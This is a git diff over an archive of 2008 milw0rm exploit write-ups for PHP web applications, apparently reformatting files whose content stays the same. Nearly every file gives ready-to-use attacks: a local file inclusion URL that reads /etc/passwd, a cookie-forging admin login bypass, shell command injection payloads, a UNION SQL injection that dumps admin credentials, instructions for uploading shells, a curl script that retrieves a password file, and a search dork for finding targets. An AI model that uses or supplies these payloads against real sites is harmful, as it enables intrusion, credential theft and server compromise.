diff --git a/platforms/php/webapps/7417.txt b/platforms/php/webapps/7417.txt
index 8fdd2e7fa..c71d39ea0 100755
--- a/platforms/php/webapps/7417.txt
+++ b/platforms/php/webapps/7417.txt
@@ -1,27 +1,27 @@
-#phpaddedit-1.3 LFI
-
-
-#Author: nuclear
-
-
-#script:http://sourceforge.net/projects/phpaddedit/
-
-
-#vuln:http://target.com/addedit-render.php?editform=../../../../../../../etc/passwd%00
-
-
-#vulnerable code:
-if (!$formname && $_GET["editform"]) $formname = $_GET["editform"];
-...
-if ( $error_message || $error || !$_POST["submitval"] ) {
-    include_once ($formname."-header.inc.php");
-    include_once ($addeditcwd."addedit-create-form.php");
-    include_once ($formname."-footer.inc.php");
-}
-
-
-
-
-#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r
-
-# milw0rm.com [2008-12-10]
+#phpaddedit-1.3 LFI
+
+
+#Author: nuclear
+
+
+#script:http://sourceforge.net/projects/phpaddedit/
+
+
+#vuln:http://target.com/addedit-render.php?editform=../../../../../../../etc/passwd%00
+
+
+#vulnerable code:
+if (!$formname && $_GET["editform"]) $formname = $_GET["editform"];
+...
+if ( $error_message || $error || !$_POST["submitval"] ) {
+    include_once ($formname."-header.inc.php");
+    include_once ($addeditcwd."addedit-create-form.php");
+    include_once ($formname."-footer.inc.php");
+}
+
+
+
+
+#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r
+
+# milw0rm.com [2008-12-10]
diff --git a/platforms/php/webapps/7418.txt b/platforms/php/webapps/7418.txt
index 390276c44..321acfac5 100755
--- a/platforms/php/webapps/7418.txt
+++ b/platforms/php/webapps/7418.txt
@@ -1,39 +1,39 @@
--------------------------------------
-   PhpAddEdit 1.3 Login By Pass 
--------------------------------------
-
-Found By: x0r ( Evolution Team )
-Email: andry2000@hotmail.it
--------------------------------------
-
-Bug In: Addedit-login.php
-
-		if (!$login_error) {
-			// --- Set admin cookie so favorite form field will show up when I use
-the site...
-			if ($_POST["rememberme"]) {
-				$expire = mktime(0,0,0,date("m"),date("d")+120,date("Y"));
-				setcookie("addedit", $_POST["adminuser"], $expire, "/", "", 0);
-			} else {
-				setcookie("addedit", $_POST["adminuser"]);
-			}
-			Header("Location:  ./");
-		}
-	}
-	
-Ci basta conoscere l'username dell'admin per bypassare il login :P ^ ^
--------------------------------------
-
-Exploit:
-
-javascript:document.cookie = "addedit=[adminuser]; path=/";
-
-es:
-
-javascript:document.cookie = "addedit=x0r; path=/";
---------------------------------------
-Live Demo: http://www.phpaddedit.com/demo/
---------------------------------------
-Greetz: Amore oggi +65 ti amo troppo.
-
-# milw0rm.com [2008-12-11]
+-------------------------------------
+   PhpAddEdit 1.3 Login By Pass 
+-------------------------------------
+
+Found By: x0r ( Evolution Team )
+Email: andry2000@hotmail.it
+-------------------------------------
+
+Bug In: Addedit-login.php
+
+		if (!$login_error) {
+			// --- Set admin cookie so favorite form field will show up when I use
+the site...
+			if ($_POST["rememberme"]) {
+				$expire = mktime(0,0,0,date("m"),date("d")+120,date("Y"));
+				setcookie("addedit", $_POST["adminuser"], $expire, "/", "", 0);
+			} else {
+				setcookie("addedit", $_POST["adminuser"]);
+			}
+			Header("Location:  ./");
+		}
+	}
+	
+Ci basta conoscere l'username dell'admin per bypassare il login :P ^ ^
+-------------------------------------
+
+Exploit:
+
+javascript:document.cookie = "addedit=[adminuser]; path=/";
+
+es:
+
+javascript:document.cookie = "addedit=x0r; path=/";
+--------------------------------------
+Live Demo: http://www.phpaddedit.com/demo/
+--------------------------------------
+Greetz: Amore oggi +65 ti amo troppo.
+
+# milw0rm.com [2008-12-11]
diff --git a/platforms/php/webapps/7422.txt b/platforms/php/webapps/7422.txt
index 47e6a2903..6ba7a58a3 100755
--- a/platforms/php/webapps/7422.txt
+++ b/platforms/php/webapps/7422.txt
@@ -1,29 +1,29 @@
-###############################
-Feed Cms 1.07.03.19 Beta LFI
-###############################
-Autore: x0r
-Email: andry2000@hotmail.it
-Download:
-http://heanet.dl.sourceforge.net/sourceforge/feedcms/FeedCms1.07.03.19Beta.rar
-###############################
-Bug In: index.php
-
-if ($_GET['lang'])
-{
-	$language = $_GET['lang'];
-	
-	setcookie('firstlang',$language,time()+3600*240*365);
-	header('location:'.$redirect);
-}
-$lang = $_COOKIE['firstlang'] ? $_COOKIE['firstlang'] : $lang;
-include_once($FeedCms_Dir."lang/$lang/$lang.php");
-
-LFI By Cookie ^ ^
-
-Exploit: 
-
-http://[site]/FeedCms/?lang=[LFI] ^ ^
-
-Greetz: A Te Che Mi Hai Cambiato La Vita...
-
-# milw0rm.com [2008-12-11]
+###############################
+Feed Cms 1.07.03.19 Beta LFI
+###############################
+Autore: x0r
+Email: andry2000@hotmail.it
+Download:
+http://heanet.dl.sourceforge.net/sourceforge/feedcms/FeedCms1.07.03.19Beta.rar
+###############################
+Bug In: index.php
+
+if ($_GET['lang'])
+{
+	$language = $_GET['lang'];
+	
+	setcookie('firstlang',$language,time()+3600*240*365);
+	header('location:'.$redirect);
+}
+$lang = $_COOKIE['firstlang'] ? $_COOKIE['firstlang'] : $lang;
+include_once($FeedCms_Dir."lang/$lang/$lang.php");
+
+LFI By Cookie ^ ^
+
+Exploit: 
+
+http://[site]/FeedCms/?lang=[LFI] ^ ^
+
+Greetz: A Te Che Mi Hai Cambiato La Vita...
+
+# milw0rm.com [2008-12-11]
diff --git a/platforms/php/webapps/7426.txt b/platforms/php/webapps/7426.txt
index c60819e5e..378750e6c 100755
--- a/platforms/php/webapps/7426.txt
+++ b/platforms/php/webapps/7426.txt
@@ -1,26 +1,26 @@
-****(remote file upload)****
-
-script: PHP_Support_Tickets_v2.2
-   
-***************************************************************************
-download from:http://www.phpsupporttickets.com/modules/phpsupporttickets.com/dist/free/PHP_Support_Tickets_v2.2.zip
-   
-***************************************************************************
-1:www.site.com/path/index.php?page=register
-
-2:New Ticket
-
-3:upload php file
-
-shell www.site.com/path/upload/you user/phpst_ticket_number/shell.php
-   
-***************************************************
-
-
-Author: ahmadbady 
-
-my mail: kivi_hacker666@yahoo.com
-
-***************************************************
-
-# milw0rm.com [2008-12-11]
+****(remote file upload)****
+
+script: PHP_Support_Tickets_v2.2
+   
+***************************************************************************
+download from:http://www.phpsupporttickets.com/modules/phpsupporttickets.com/dist/free/PHP_Support_Tickets_v2.2.zip
+   
+***************************************************************************
+1:www.site.com/path/index.php?page=register
+
+2:New Ticket
+
+3:upload php file
+
+shell www.site.com/path/upload/you user/phpst_ticket_number/shell.php
+   
+***************************************************
+
+
+Author: ahmadbady 
+
+my mail: kivi_hacker666@yahoo.com
+
+***************************************************
+
+# milw0rm.com [2008-12-11]
diff --git a/platforms/php/webapps/7430.txt b/platforms/php/webapps/7430.txt
index 0ed620496..e4f6e0b80 100755
--- a/platforms/php/webapps/7430.txt
+++ b/platforms/php/webapps/7430.txt
@@ -1,78 +1,77 @@
-
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- ################################################################
- #  [ sumon <= 0.7.0 ]  Remote Command Execution Vulnerability  #
- ################################################################
- #
- # Script: Simple Unix MONitor (sumon)
- #
- # Script Site: http://sumon.sourceforge.net/
- # Download: http://sourceforge.net/projects/sumon
- #
- # Vuln: http://site.com/sumon-0.7.0/chg.php?host=|id>/tmp/dupa;
- #     
- # Bug: ./sumon-0.7.0/server/www/chg.php (lines: 32-25, 99)
- #
- # ...
- #       if (array_key_exists("host",$_GET))
- #       {
- #          $host         =  $_GET["host"];
- #       }
- # ...
- #       passthru("${bindir}/chmgmtinfobuilder.pl --html --chgonly --node=$host --days=$days");
- # ...     
- #
- # Vuln: http://site.com/sumon-0.7.0/stats.php?host=|id>/tmp/dupa;
- #     
- # Bug: ./sumon-0.7.0/server/www/stats.php (lines: 23-25, 294)
- #
- # ...
- #        if (array_key_exists("host",$_GET))
- #        {
- #      $host         =  $_GET["host"];
- # ...     
- #         exec ("$graphstats -h $host -l $graphic -g GRAPH:".$time.":".$timefactor." ".$timestampstring." ".$endstring." > /dev/null 2>&1");
- # ...     
- #
- # Vuln: http://site.com/sumon-0.7.0/showfile.php  
- #       http://site.com/sumon-0.7.0/difffile.php
- #
- #     POST /sumon-0.7.0/showfile.php  HTTP/1.1
- #    
- #    Host: site.com
- #    User-Agent: Mozilla/5.0
- #    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- #    Accept-Language: pl,en-us;q=0.7,en;q=0.3
- #    Accept-Encoding: gzip,deflate
- #    Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
- #    Keep-Alive: 300
- #    Connection: keep-alive
- #    Content-Type: application/x-www-form-urlencoded
- #    Content-Length: 27
- #    
- #    fichero_post=|id>/tmp/dupa;
- #
- # Bug: ./sumon-0.7.0/server/www/showfile.php (lines: 36)
- #      ./sumon-0.7.0/server/www/difffile.php (lines: 36)
- # ...
- #           passthru("${bindir}/showfile.pl ${datadir}/$_POST[fichero_post]");
- # ...     
- #
- #
- ###############################################
- # Greetz: D3m0n_DE * str0ke * and otherz..
- ###############################################
-
- [ dun / 2008 ]
-
-*******************************************************************************************
-
-# milw0rm.com [2008-12-12]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ ################################################################
+ #  [ sumon <= 0.7.0 ]  Remote Command Execution Vulnerability  #
+ ################################################################
+ #
+ # Script: Simple Unix MONitor (sumon)
+ #
+ # Script Site: http://sumon.sourceforge.net/
+ # Download: http://sourceforge.net/projects/sumon
+ #
+ # Vuln: http://site.com/sumon-0.7.0/chg.php?host=|id>/tmp/dupa;
+ #     
+ # Bug: ./sumon-0.7.0/server/www/chg.php (lines: 32-25, 99)
+ #
+ # ...
+ #       if (array_key_exists("host",$_GET))
+ #       {
+ #          $host         =  $_GET["host"];
+ #       }
+ # ...
+ #       passthru("${bindir}/chmgmtinfobuilder.pl --html --chgonly --node=$host --days=$days");
+ # ...     
+ #
+ # Vuln: http://site.com/sumon-0.7.0/stats.php?host=|id>/tmp/dupa;
+ #     
+ # Bug: ./sumon-0.7.0/server/www/stats.php (lines: 23-25, 294)
+ #
+ # ...
+ #        if (array_key_exists("host",$_GET))
+ #        {
+ #      $host         =  $_GET["host"];
+ # ...     
+ #         exec ("$graphstats -h $host -l $graphic -g GRAPH:".$time.":".$timefactor." ".$timestampstring." ".$endstring." > /dev/null 2>&1");
+ # ...     
+ #
+ # Vuln: http://site.com/sumon-0.7.0/showfile.php  
+ #       http://site.com/sumon-0.7.0/difffile.php
+ #
+ #     POST /sumon-0.7.0/showfile.php  HTTP/1.1
+ #    
+ #    Host: site.com
+ #    User-Agent: Mozilla/5.0
+ #    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ #    Accept-Language: pl,en-us;q=0.7,en;q=0.3
+ #    Accept-Encoding: gzip,deflate
+ #    Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
+ #    Keep-Alive: 300
+ #    Connection: keep-alive
+ #    Content-Type: application/x-www-form-urlencoded
+ #    Content-Length: 27
+ #    
+ #    fichero_post=|id>/tmp/dupa;
+ #
+ # Bug: ./sumon-0.7.0/server/www/showfile.php (lines: 36)
+ #      ./sumon-0.7.0/server/www/difffile.php (lines: 36)
+ # ...
+ #           passthru("${bindir}/showfile.pl ${datadir}/$_POST[fichero_post]");
+ # ...     
+ #
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * str0ke * and otherz..
+ ###############################################
+
+ [ dun / 2008 ]
+
+*******************************************************************************************
+
+# milw0rm.com [2008-12-12]
diff --git a/platforms/php/webapps/7432.txt b/platforms/php/webapps/7432.txt
index b3de97621..a356ea194 100755
--- a/platforms/php/webapps/7432.txt
+++ b/platforms/php/webapps/7432.txt
@@ -1,33 +1,33 @@
-[■]  Xpoze Pro  (home menù) <= Blind $ql Injection
-
- 
->---------------------------------------<
-
-> AuToR: XaDoS (SecurityCode Team)
-> Contact M&: xados [at] hotmail [dot] it
-> B§g: Blind $ql inJection
-> SIte vuln: http://www.xpoze.org/
-
->---------------------------------------<
- 
- 
-[â– ] ExPL0iT:
- 
-Dork: " Powered by Xpoze "
-
-|: http://www.example.com/home.html?menu=[$qL] 
-
-
-[■] D£M0: 
- 
-|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=5  [NO°°]
- 
-|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=4 [y&$ ;-)] 
- 
-
- 
-[â– ] Th4nKs::
- 
-\> Str0ke </ \>Il pavimento</ \>sibilla</ \>Lo z00</ \>I FoxHound ( goto www.myspace.com/foxhoundindie )
-
-# milw0rm.com [2008-12-12]
+[■]  Xpoze Pro  (home menù) <= Blind $ql Injection
+
+ 
+>---------------------------------------<
+
+> AuToR: XaDoS (SecurityCode Team)
+> Contact M&: xados [at] hotmail [dot] it
+> B§g: Blind $ql inJection
+> SIte vuln: http://www.xpoze.org/
+
+>---------------------------------------<
+ 
+ 
+[â– ] ExPL0iT:
+ 
+Dork: " Powered by Xpoze "
+
+|: http://www.example.com/home.html?menu=[$qL] 
+
+
+[■] D£M0: 
+ 
+|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=5  [NO°°]
+ 
+|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=4 [y&$ ;-)] 
+ 
+
+ 
+[â– ] Th4nKs::
+ 
+\> Str0ke </ \>Il pavimento</ \>sibilla</ \>Lo z00</ \>I FoxHound ( goto www.myspace.com/foxhoundindie )
+
+# milw0rm.com [2008-12-12]
diff --git a/platforms/php/webapps/7433.txt b/platforms/php/webapps/7433.txt
index 8470db13c..2d42b191e 100755
--- a/platforms/php/webapps/7433.txt
+++ b/platforms/php/webapps/7433.txt
@@ -1,54 +1,54 @@
- 
-                          ||          ||   | ||         
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,  
-                  ( :   /    (_)    /           (   .   
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
- 
- 
-<<!>> Found by  :  Cyb3r-1sT
- 
-<<!>> C0ntact : cyb3r-1st [at] hotmail.com  
-                    
-<<!>> Groups : InjEctOr5 T3am  
- 
-=======================================================
-+++++++++++++++++++ Script information+++++++++++++++++
-=======================================================
- 
- 
-<<->> script   : Social Groupie
- 
-<<->> download : www.socialgroupie.com   
- 
- 
-=======================================================
-+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
-=======================================================
- 
- 
-<<->> D0rk    : find it
- 
-<<->> Exploit :>>>
- 
-    :>>  http://www.site.me/group_index.php?id=-1067+Union+select+0,0,0,0,0,0,0,0,0,concat(username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+tbl_admin--
- 
- 
- 
-=======================================================
-++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
-=======================================================
- 
-<<->> All freinds , all muslims , str0ke 
-
-# milw0rm.com [2008-12-12]
+ 
+                          ||          ||   | ||         
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,  
+                  ( :   /    (_)    /           (   .   
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+ 
+ 
+<<!>> Found by  :  Cyb3r-1sT
+ 
+<<!>> C0ntact : cyb3r-1st [at] hotmail.com  
+                    
+<<!>> Groups : InjEctOr5 T3am  
+ 
+=======================================================
++++++++++++++++++++ Script information+++++++++++++++++
+=======================================================
+ 
+ 
+<<->> script   : Social Groupie
+ 
+<<->> download : www.socialgroupie.com   
+ 
+ 
+=======================================================
++++++++++++++++++++++++ Exploit +++++++++++++++++++++++
+=======================================================
+ 
+ 
+<<->> D0rk    : find it
+ 
+<<->> Exploit :>>>
+ 
+    :>>  http://www.site.me/group_index.php?id=-1067+Union+select+0,0,0,0,0,0,0,0,0,concat(username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+tbl_admin--
+ 
+ 
+ 
+=======================================================
+++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
+=======================================================
+ 
+<<->> All freinds , all muslims , str0ke 
+
+# milw0rm.com [2008-12-12]
diff --git a/platforms/php/webapps/7434.sh b/platforms/php/webapps/7434.sh
index 48acf270d..f75c38ee1 100755
--- a/platforms/php/webapps/7434.sh
+++ b/platforms/php/webapps/7434.sh
@@ -1,19 +1,19 @@
-#!/bin/bash
-# Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit
-# by athos - staker[at]hotmail[dot]it
-
-host=$1;
-name=$2;
-path='/config/passwd.txt';
-
-if [ "$name" = "" ]; then
-        echo "Usage: bash $0 [host/path] [filename]";
-        echo "by athos - staker[at]hotmail[dot]it";
-        exit;
-fi;      
-
-curl $host/$path > $name;
-clear
-cat $name;
-
-# milw0rm.com [2008-12-12]
+#!/bin/bash
+# Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit
+# by athos - staker[at]hotmail[dot]it
+
+host=$1;
+name=$2;
+path='/config/passwd.txt';
+
+if [ "$name" = "" ]; then
+        echo "Usage: bash $0 [host/path] [filename]";
+        echo "by athos - staker[at]hotmail[dot]it";
+        exit;
+fi;      
+
+curl $host/$path > $name;
+clear
+cat $name;
+
+# milw0rm.com [2008-12-12]
diff --git a/platforms/php/webapps/7435.txt b/platforms/php/webapps/7435.txt
index e6a4d61f7..fa794993f 100755
--- a/platforms/php/webapps/7435.txt
+++ b/platforms/php/webapps/7435.txt
@@ -1,56 +1,56 @@
- 
-                          ||          ||   | ||         
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,  
-                  ( :   /    (_)    /           (   .   
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
- 
- 
-<<!>> Found by  :  Cyb3r-1sT
- 
-<<!>> C0ntact : cyb3r-1st [at] hotmail.com  
-                    
-<<!>> Groups : InjEctOr5 T3am  
- 
-=======================================================
-+++++++++++++++++++ Script information+++++++++++++++++
-=======================================================
- 
- 
-<<->> script   : Social Groupie
- 
-<<->> download : www.socialgroupie.com   
- 
- 
-=======================================================
-+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
-=======================================================
- 
- 
-<<->> D0rk    : find it
- 
-<<->> Exploit :>>>  After u Register in site flow this steps  
- 
-                         Step 1 :>  Goto photos section : http://www.site.me/Photos/photos.php
- 
-                         Step 2 :> Create new album :  http://www.site.me/Photos/create_album.php
- 
-                         Step 3 :> Upload ur shell as ( shell.jpg.php Or shell.php ) .. Ur shell will be here http://www.site.me/Member_images/
- 
-=======================================================
-++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
-=======================================================
- 
-<<->> All freinds , all muslims , str0ke 
-
-# milw0rm.com [2008-12-12]
+ 
+                          ||          ||   | ||         
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,  
+                  ( :   /    (_)    /           (   .   
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+ 
+ 
+<<!>> Found by  :  Cyb3r-1sT
+ 
+<<!>> C0ntact : cyb3r-1st [at] hotmail.com  
+                    
+<<!>> Groups : InjEctOr5 T3am  
+ 
+=======================================================
++++++++++++++++++++ Script information+++++++++++++++++
+=======================================================
+ 
+ 
+<<->> script   : Social Groupie
+ 
+<<->> download : www.socialgroupie.com   
+ 
+ 
+=======================================================
++++++++++++++++++++++++ Exploit +++++++++++++++++++++++
+=======================================================
+ 
+ 
+<<->> D0rk    : find it
+ 
+<<->> Exploit :>>>  After u Register in site flow this steps  
+ 
+                         Step 1 :>  Goto photos section : http://www.site.me/Photos/photos.php
+ 
+                         Step 2 :> Create new album :  http://www.site.me/Photos/create_album.php
+ 
+                         Step 3 :> Upload ur shell as ( shell.jpg.php Or shell.php ) .. Ur shell will be here http://www.site.me/Member_images/
+ 
+=======================================================
+++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
+=======================================================
+ 
+<<->> All freinds , all muslims , str0ke 
+
+# milw0rm.com [2008-12-12]
diff --git a/platforms/php/webapps/7437.txt b/platforms/php/webapps/7437.txt
index b1c746d88..f7a243f14 100755
--- a/platforms/php/webapps/7437.txt
+++ b/platforms/php/webapps/7437.txt
@@ -1,154 +1,154 @@
-Moodle 1.9.3 Remote Code Execution
-
-Name              Remote Code Execution in Moodle
-Systems Affected  Moodle 1.9.3 and possibly earlier versions
-Severity          High
-Impact (CVSSv2)   High 7.3/10, vector: (AV:N/AC:L/Au:M/C:P/I:P/A:C)
-Vendor            http://moodle.org/
-Advisory          http://www.ush.it/team/ush/hack-moodle193/moodle193.txt
-Authors           Antonio "s4tan" Parata (s4tan AT ush DOT it)
-                  Francesco "ascii" Ongaro (ascii AT ush DOT it)
-                  Giovanni "evilaliv3" Pellerano (evilaliv3 AT
-                  digitalbullets DOT org)
-Date              20081212
-
-I. BACKGROUND
-
->From the Moodle web site: "Moodle is a course management system (CMS) -
-a free, Open Source software package designed using sound pedagogical
-principles, to help educators create effective online learning
-communities".
-
-II. DESCRIPTION
-
-A Remote Code Execution exists in Moodle 1.9.3.
-
-III. ANALYSIS
-
-- Remote Code Execution (RCE) in texed.php (pathname parameter)
-
-A Remote Code Execution (RCE) vulnerability has been found in
-filter/tex/texed.php. In order to exploit this vulnerability
-register_globals must be enabled as the "TeX Notation" filter.
-
-All these conditions reduce the impact of the vulnerability, to remark
-this fact we have set "multiple authentication" flag in the cvss2 score).
-
-In texed.php we find the following instructions:
-
---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
-
-$cmd = tex_filter_get_cmd($pathname, $texexp);
-system($cmd, $status);
-
---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
-
-Where the function "tex_filter_get_cmd", defined in lib.php, is the
-following:
-
---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
-
-function tex_filter_get_cmd($pathname, $texexp) {
-    $texexp = escapeshellarg($texexp);
-    $executable = tex_filter_get_executable(false);
-
-    if ((PHP_OS == "WINNT") || (PHP_OS == "WIN32") || (PHP_OS ==
-"Windows")) {
-        $executable = str_replace(' ', '^ ', $executable);
-        return "$executable ++ -e  \"$pathname\" -- $texexp";
-
-    } else {
-        return "\"$executable\" -e \"$pathname\" -- $texexp";
-    }
-}
-
---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
-
-As we can see no check is performed on the "$pathname" parameter neither
-in "texed.php" neither in the "tex_filter_get_cmd" function declared in
-"lib.php".
-
-Seen this it's possible to exploit this vulnerability to execute
-arbitrary commands on the target server. The following urls are proof
-of concept for Linux and Windows:
-
-On Linux:
-http://www.example.com/moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;echo+"
-
-On Windows:
-http://www.example.com/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+dir+||+echo+
-
-This RCE is "blind". You'll never see the list dir of the example
-because there is no print of the system command output.
-
-IV. DETECTION
-
-Moodle 1.9.3 and possibly earlier versions are vulnerable.
-
-V. WORKAROUND
-
-Proper input validation will fix the vulnerabilities. Actually the
-vulnerability is fixed in the Dev tree.
-
-Upgrade to latest development version.
-
-VI. VENDOR RESPONSE
-
-Vendor will not release a new version addressing this vulnerability
-since moodle has several different issues with register globals and
-the vendor decided to resolve them in a different way for the upcoming
-versions.
-
-"At present we are working on changes that will prevent installation when
-register globals on. They should be committed later this week. I suppose
-we are not going to release 1.9.4 now because register globals issue is
-a know problem already."
-
-VII. CVE INFORMATION
-
-No CVE at this time.
-
-VIII. DISCLOSURE TIMELINE
-
-20080121 Bug discovered
-20081111 Initial vendor contact (No Response)
-20081811 Second vendor contact (No Response)
-20081811 Vendor response
-20081212 Advisory released (Fix available only in dev tree)
-
-IX. CREDIT
-
-Antonio "s4tan" Parata, Francesco "ascii" Ongaro and Giovanni
-"evilaliv3" Pellerano are credited with the discovery of this
-vulnerability.
-
-Antonio "s4tan" Parata
-web site: http://www.ictsc.it/
-mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it
-
-Francesco "ascii" Ongaro
-web site: http://www.ush.it/
-mail: ascii AT ush DOT it
-
-Giovanni "evilaliv3" Pellerano
-mail: evilaliv3 AT digitalbullets DOT it
-
-X. LEGAL NOTICES
-
-Copyright (c) 2008 Francesco "ascii" Ongaro
-
-Permission is granted for the redistribution of this alert
-electronically. It may not be edited in any way without mine express
-written consent. If you wish to reprint the whole or any
-part of this alert in any other medium other than electronically,
-please email me for permission.
-
-Disclaimer: The information in the advisory is believed to be accurate
-at the time of publishing based on currently available information. Use
-of the information constitutes acceptance for use in an AS IS condition.
-There are no warranties with regard to this information. Neither the
-author nor the publisher accepts any liability for any direct, indirect,
-or consequential loss or damage arising from use of, or reliance on,
-this information.
-
-# milw0rm.com [2008-12-12]
+Moodle 1.9.3 Remote Code Execution
+
+Name              Remote Code Execution in Moodle
+Systems Affected  Moodle 1.9.3 and possibly earlier versions
+Severity          High
+Impact (CVSSv2)   High 7.3/10, vector: (AV:N/AC:L/Au:M/C:P/I:P/A:C)
